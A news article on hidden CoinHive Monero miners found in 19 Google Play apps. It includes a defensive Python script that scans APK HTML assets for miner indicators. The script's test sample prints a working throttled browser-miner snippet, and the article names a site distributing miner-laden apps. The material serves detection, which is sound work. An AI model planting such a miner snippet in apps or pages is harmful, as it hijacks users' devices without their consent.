Hackers are using hidden codes to mine cryptocurrencies in Google Play apps
Malicious JavaScript code that mines the open source cryptocurrency Monero has been found inside 19 Android apps. Some of these apps had more than 100,000 installs.
Cryptocurrencies are turning out to be a playground for cyber criminals. Researchers say hackers could be mining cryptocurrency on Android phones using hidden code, without the knowledge of users.
British security firm Sophos has identified 19 Google Play apps that hackers are using to discreetly mine ‘Monero’ — an open source cryptocurrency that operates on blockchain technology. These Android apps contain “embedded CoinHive-based miners” that allow hackers to generate Monero using the apps’ built-in browser.
Because the malicious CoinHive code is hidden, users are unaware that crypto is being mined on their devices. They could experience some sluggishness or heating on their phones due to the CPU strain, but there’s no other indication.
Sometimes, hackers are able to conceal even that by CPU throttling (limiting how much of the CPU the miner uses so the strain is less noticeable). Sophos found that the malicious JavaScript code was hidden in HTML files in the targeted apps’ assets folder.
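Because the miner sits in plain HTML files under the APK's assets folder, a defender can check an app for it without running it: unpack the APK (a zip file) and scan every HTML asset for the markers a CoinHive-style miner leaves behind. The script below is an added example written for this article, not code from Sophos or from the apps described; the indicator patterns are assumptions drawn from the public CoinHive browser-miner API (its script filename, constructor name and throttle call), and the sample APK is constructed in memory so the script runs offline.

```python
"""Scan an APK's assets folder for HTML files that embed a browser-based miner."""
import io
import re
import zipfile

# Indicator patterns (assumption: based on the public CoinHive API, not on the article).
# Each one alone is weak; several together in one HTML asset is a strong signal.
MINER_PATTERNS = [
    re.compile(r"coinhive\.min\.js", re.I),          # miner library being loaded
    re.compile(r"CoinHive\.Anonymous\s*\(", re.I),   # miner object constructed with a site key
    re.compile(r"\.setThrottle\s*\(", re.I),         # CPU throttling used to stay unnoticed
    re.compile(r"\bminer\.start\s*\(", re.I),        # mining actually started
]


def scan_html(text: str) -> list:
    """Return the indicator patterns that match in a single HTML document."""
    return [p.pattern for p in MINER_PATTERNS if p.search(text)]


def scan_apk(apk_bytes: bytes) -> dict:
    """Open an APK (a zip archive) and scan every HTML file under assets/.

    Returns {asset_path: [matched patterns]} for suspicious files only.
    """
    findings = {}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        for name in z.namelist():
            if not name.startswith("assets/"):
                continue
            if not name.lower().endswith((".html", ".htm")):
                continue
            text = z.read(name).decode("utf-8", errors="replace")
            hits = scan_html(text)
            if hits:
                findings[name] = hits
    return findings


def build_sample_apk() -> bytes:
    """Constructed sample: a minimal zip mimicking an APK layout, with one benign
    HTML asset and one that loads and starts a throttled browser miner."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", "<manifest/>")
        z.writestr("assets/help.html", "<html><body><h1>Help</h1></body></html>")
        z.writestr(
            "assets/videos.html",
            "<html><head><script src='https://coinhive.com/lib/coinhive.min.js'></script></head>"
            "<body><script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER');"
            "miner.setThrottle(0.3); miner.start();</script></body></html>",
        )
    return buf.getvalue()


if __name__ == "__main__":
    # Usage against a real file would be: scan_apk(open("app.apk", "rb").read())
    for path, hits in scan_apk(build_sample_apk()).items():
        print(f"{path}: {len(hits)} miner indicators {hits}")
```

The scan is deliberately static and string-based: it catches the straightforward case the article describes, where the script is stored in clear text inside an asset, but it will miss a miner whose script is fetched at runtime or obfuscated, so it complements rather than replaces behavioural checks such as watching for sustained CPU load while the app's WebView is open.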
Android malware
Interestingly, all 19 apps being used to mine Monero seem to have been built by the same developer. A number of these apps contained wrestling videos and information, and were released around Christmas. Some of them had recorded over 100,000 installs. Pankaj Kohli, Threat Researcher at Sophos, said:
Google Play has become a favourite malware distribution point to infect smartphones with cryptocurrency miners. Bitcoin-mining malware has a long history in Google Play, with the first family — Andr/LepriCon-A — appearing in 2014.
Sophos had earlier recorded over 28,000 Loapi mining malware variants. Most of them were released between June and November 2017 when Bitcoin’s price surged nearly 500 percent.
Hackers might be using another method as well for mining cryptocurrency on Android devices. This utilises “third-party mining modules” such as ‘CoinMiner’, found in tampered versions of apps on third-party websites or in official versions on the Google Play Store. CoinMiner uses a version of ‘cpuminer’ to mine either Bitcoin or Monero on a victim’s device.
One of the sites distributing samples riddled with CoinMiner is http://coandroid.ru. It offers apps disguised as installers for popular Google Play apps, including the SafetyNet Wireless app, which offers its users subsidised cell phone service; Recitiamo Santo Rosario, a religious app; and Car Wallpaper HD Free, which allows users to automatically change their wallpaper daily. Sophos had notified Google of the malware, and these apps have since been removed. Sophos states:
The rise of CoinHive and CoinMiner comes after the recent discovery of Loapi, which masquerades as popular antivirus apps or an adult content app. It downloads and installs several modules, each of which performs a different malicious action such as sending device information to a remote server, stealing SMS, fetching advertisements, crawling web pages, creating a proxy and mining Monero.
How to avoid
Android users who want to avoid falling victim to crypto mining should refrain from downloading and installing apps from untrusted third-party websites. They should rely on genuine app stores only.
While some malware “evidently manages to slip through the net on the Play Store” as well, Sophos says, Google does endeavour to find and remove them, thus minimising risks.
Accidental clicks on malicious ads can also lead to unwarranted crypto mining on devices. These use malicious code hidden in ads to redirect users to sites where cyber criminals mine Monero. Mobile ad blockers can stop malicious ads from showing up, to an extent.
A separate report by Kaspersky Lab revealed recently that crypto mining can permanently damage user devices. While desktop computers may be able to bear the hardware stress that comes with cryptocurrency mining, mobile devices are more fragile and their batteries can be permanently damaged.
Hence, users have to be ultra careful of what they download, install, and click on.